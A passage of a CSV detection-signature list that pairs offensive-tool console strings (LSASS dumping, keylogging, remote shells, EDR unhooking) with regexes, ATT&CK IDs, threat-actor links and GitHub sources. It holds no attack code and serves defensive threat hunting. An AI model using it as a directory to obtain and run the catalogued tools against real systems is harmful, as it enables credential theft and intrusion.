"*[+] Injecting dropper.vba into *",".{0,1000}\[\+\]\sInjecting\sdropper\.vba\sinto\s.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#content","N/A","10","","N/A","","","","13185"
"*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13186"
"*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","0","#content","N/A","9","10","1186","191","2024-05-08T20:24:35Z","2021-09-28T16:52:24Z","13187"
"*[+] Injecting into existing process*",".{0,1000}\[\+\]\sInjecting\sinto\sexisting\sprocess.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13188"
"*[+] Injecting Shellcode into Remote Process*",".{0,1000}\[\+\]\sInjecting\sShellcode\sinto\sRemote\sProcess.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#content","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","13189"
"*[+] Invoke-DCSync Loaded*",".{0,1000}\[\+\]\sInvoke\-DCSync\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13190"
"*[+] Invoke-GrabTheHash Loaded*",".{0,1000}\[\+\]\sInvoke\-GrabTheHash\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13191"
"*[+] Invoking EfsRpcAddUsersToFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcAddUsersToFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13192"
"*[+] Invoking EfsRpcAddUsersToFileEx with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcAddUsersToFileEx\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13193"
"*[+] Invoking EfsRpcDecryptFileSrv with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcDecryptFileSrv\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13194"
"*[+] Invoking EfsRpcDuplicateEncryptionInfoFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcDuplicateEncryptionInfoFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13195"
"*[+] Invoking EfsRpcDuplicateEncryptionInfoFile with target path:*",".{0,1000}\[\+\]\sInvoking\sEfsRpcDuplicateEncryptionInfoFile\swith\starget\spath\:.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13196"
"*[+] Invoking EfsRpcEncryptFileSrv with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcEncryptFileSrv\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13197"
"*[+] Invoking EfsRpcFileKeyInfo with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcFileKeyInfo\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13198"
"*[+] Invoking EfsRpcFileKeyInfoEx with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcFileKeyInfoEx\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13199"
"*[+] Invoking EfsRpcGetEncryptedFileMetadata with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcGetEncryptedFileMetadata\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13200"
"*[+] Invoking EfsRpcOpenFileRaw with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcOpenFileRaw\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13201"
"*[+] Invoking EfsRpcQueryRecoveryAgents with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcQueryRecoveryAgents\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13202"
"*[+] Invoking EfsRpcQueryUsersOnFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcQueryUsersOnFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13203"
"*[+] Invoking EfsRpcRemoveUsersFromFile with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcRemoveUsersFromFile\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13204"
"*[+] Invoking EfsRpcSetEncryptedFileMetadata with target path: *",".{0,1000}\[\+\]\sInvoking\sEfsRpcSetEncryptedFileMetadata\swith\starget\spath\:\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13205"
"*[+] Jecretz Results*",".{0,1000}\[\+\]\sJecretz\sResults.{0,1000}","offensive_tool_keyword","jecretz","Jira Secret Hunter - Helps you find credentials and sensitive contents in Jira tickets","T1552 - T1114 - T1119 - T1070","TA0006 - TA0009 - TA0005","N/A","Scattered Spider*","Discovery","https://github.com/sahadnk72/jecretz","1","0","#content","N/A","7","1","43","9","2022-12-08T10:00:11Z","2020-05-25T14:40:28Z","13206"
"*[+] Keylog recieved, data written to keylog.txt!*",".{0,1000}\[\+\]\sKeylog\srecieved,\sdata\swritten\sto\skeylog\.txt!.{0,1000}","offensive_tool_keyword","peeping-tom","Remote keylogger for Windows written in C++","T1056.001 - T1123 - T1129 - T1113","TA0006 - TA0008 - TA0009","N/A","Dispossessor","Collection","https://github.com/shehzade/peeping-tom","1","0","#content","keylogger","10","1","3","0","2022-07-24T09:31:59Z","2022-04-15T14:16:41Z","13207"
"*[+] Keylog saved to *",".{0,1000}\[\+\]\sKeylog\ssaved\sto\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13208"
"*[+] Keylogger started *",".{0,1000}\[\+\]\sKeylogger\sstarted\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13209"
"*[+] Keylogger started with PID *",".{0,1000}\[\+\]\sKeylogger\sstarted\swith\sPID\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13210"
"*[+] Keylogger started*",".{0,1000}\[\+\]\sKeylogger\sstarted.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","#content","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","13211"
"*[+] Keylogger stopped*",".{0,1000}\[\+\]\sKeylogger\sstopped.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","#content","N/A","10","10","54","18","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z","13212"
"*[+] keystrokes dump from agent*",".{0,1000}\[\+\]\skeystrokes\sdump\sfrom\sagent.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","#content","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","13213"
"*[+] Listing ntdll Nt/Zw functions*",".{0,1000}\[\+\]\sListing\sntdll\sNt\/Zw\sfunctions.{0,1000}","offensive_tool_keyword","hookchain","Bypassing EDR Solutions","T1055.011 - T1564.001 - T1070.004 - T1562.001 - T1222","TA0005","N/A","N/A","Defense Evasion","https://github.com/helviojunior/hookchain","1","0","#content","N/A","9","6","513","85","2025-01-05T22:00:17Z","2024-03-22T13:18:02Z","13214"
"*[+] Loading BetterXencrypt and doing some encryption with random iterations*",".{0,1000}\[\+\]\sLoading\sBetterXencrypt\sand\sdoing\ssome\sencryption\swith\srandom\siterations.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13215"
"*[+] Loading PSObfuscation and randomizing script*",".{0,1000}\[\+\]\sLoading\sPSObfuscation\sand\srandomizing\sscript.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13216"
"*[+] Loading PyFuscation and doing $some obfuscation*",".{0,1000}\[\+\]\sLoading\sPyFuscation\sand\sdoing\s\$some\sobfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13217"
"*[+] Looking for the SSN via Halos Gate*",".{0,1000}\[\+\]\sLooking\sfor\sthe\sSSN\svia\sHalos\sGate.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#content","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","13218"
"*[+] LSAKEY(s) retrieving*",".{0,1000}\[\+\]\sLSAKEY\(s\)\sretrieving.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","#content","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","13219"
"*[+] LSASS dump created successfully.*",".{0,1000}\[\+\]\sLSASS\sdump\screated\ssuccessfully\..{0,1000}","offensive_tool_keyword","Lsassx","Dumping LSASS Evaded Endpoint Security Solutions","T1003.001 - T1055.001 - T1203 - T1027 - T1070.004 - T1140 - T1564.001","TA0006 - TA0005 - TA0004","N/A","N/A","Credential Access","https://github.com/yehia-mamdouh/Lsassx","1","0","#content","N/A","10","1","12","3","2025-02-15T16:41:38Z","2025-02-15T16:36:27Z","13220"
"*[+] LSASS dump done!*",".{0,1000}\[\+\]\sLSASS\sdump\sdone!.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13221"
"*[+] LSASS Dump Read: *",".{0,1000}\[\+\]\sLSASS\sDump\sRead\:\s.{0,1000}","offensive_tool_keyword","DumpLSASS","Lsass dumping tool - 50 ways of dumping lsass","T1003.001 - T1055.001 - T1620","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/elementalsouls/DumpLSASS","1","0","#content","N/A","10","1","33","5","2024-02-27T11:25:11Z","2023-04-09T12:11:10Z","13222"
"*[+] LSASS Dump Read: *",".{0,1000}\[\+\]\sLSASS\sDump\sRead\:\s.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","#content","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","13223"
"*[+] Malicious named pipe running on *",".{0,1000}\[\+\]\sMalicious\snamed\spipe\srunning\son\s.{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","#content","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","13224"
"*[+] Mimi Loaded *",".{0,1000}\[\+\]\sMimi\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13225"
"*[+] MIND YOUR OPSEC! Serving Pyramid files from folder *",".{0,1000}\[\+\]\sMIND\sYOUR\sOPSEC!\sServing\sPyramid\sfiles\sfrom\sfolder\s.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","#content","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","13226"
"*[+] Minidump successfully saved to memory*",".{0,1000}\[\+\]\sMinidump\ssuccessfully\ssaved\sto\smemory.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","0","#content","N/A","10","3","265","58","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z","13227"
"*[+] MOTD backdoor persistence establish*",".{0,1000}\[\+\]\sMOTD\sbackdoor\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13228"
"*[+] My personal simple and stupid  Token Stealer... *",".{0,1000}\[\+\]\sMy\spersonal\ssimple\sand\sstupid\s\sToken\sStealer\.\.\.\s.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","13229"
"*[+] Nameless Terminal*",".{0,1000}\[\+\]\sNameless\sTerminal.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#content","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","13230"
"*[+] New incoming shell from : *",".{0,1000}\[\+\]\sNew\sincoming\sshell\sfrom\s\:\s.{0,1000}","offensive_tool_keyword","fuegoshell","Fuegoshell is a powershell oneliner generator for Windows remote shell re-using TCP 445","T1059.001 - T1203","TA0002 - TA0011 - TA0008","N/A","N/A","Lateral Movement","https://github.com/v1k1ngfr/fuegoshell","1","0","#content","N/A","10","1","44","7","2024-04-27T09:03:28Z","2024-04-27T08:06:03Z","13231"
"*[+] No insecure resource delegations found. Eureka!*",".{0,1000}\[\+\]\sNo\sinsecure\sresource\sdelegations\sfound\.\sEureka!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","#content","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13232"
"*[+] No insecure trustee delegations found. Eureka!*",".{0,1000}\[\+\]\sNo\sinsecure\strustee\sdelegations\sfound\.\sEureka!.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","#content","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","13233"
"*[+] No PID provided, creating a new calc.exe process and using its PID*",".{0,1000}\[\+\]\sNo\sPID\sprovided,\screating\sa\snew\scalc\.exe\sprocess\sand\susing\sits\sPID.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","0","#content","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","13234"
"*[+] NtAllocateVirtualMemory Not Hooked*",".{0,1000}\[\+\]\sNtAllocateVirtualMemory\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13235"
"*[+] NTDLL unhooking enabled*",".{0,1000}\[\+\]\sNTDLL\sunhooking\senabled.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13236"
"*[+] NTDLL unhooking enabled*",".{0,1000}\[\+\]\sNTDLL\sunhooking\senabled.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13237"
"*[+] NtProtectVirtualMemory Not Hooked*",".{0,1000}\[\+\]\sNtProtectVirtualMemory\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13239"
"*[+] NtWaitForSingleObject Not Hooked*",".{0,1000}\[\+\]\sNtWaitForSingleObject\sNot\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#content","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","13240"
"*[+] Nuke is landing.*",".{0,1000}\[\+\]\sNuke\sis\slanding\..{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","#content","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","13241"
"*[+] Obtained ADSync service account token from miiserver process*",".{0,1000}\[\+\]\sObtained\sADSync\sservice\saccount\stoken\sfrom\smiiserver\sprocess.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","0","#content","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","13242"
"*[+] OK! I Closed The Two Socket.*",".{0,1000}\[\+\]\sOK!\sI\sClosed\sThe\sTwo\sSocket\..{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","13243"
"*[+] Opened Process Token Sucessufully!*",".{0,1000}\[\+\]\sOpened\sProcess\sToken\sSucessufully!.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","#content","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","13244"
"*[+] overwriting modprobe_path with different PIDs *",".{0,1000}\[\+\]\soverwriting\smodprobe_path\swith\sdifferent\sPIDs\s.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#content #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","13245"
"*[+] Parsed Procmon output for potential DLL hijack paths!*",".{0,1000}\[\+\]\sParsed\sProcmon\soutput\sfor\spotential\sDLL\shijack\spaths!.{0,1000}","offensive_tool_keyword","DLLHijackTest","DLL and PowerShell script to assist with finding DLL hijacks","T1574.002 - T1055.001 - T1059.001 - T1036.005","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/slyd0g/DLLHijackTest","1","0","#content","N/A","9","4","335","62","2020-10-01T22:37:36Z","2020-06-20T04:33:01Z","13246"
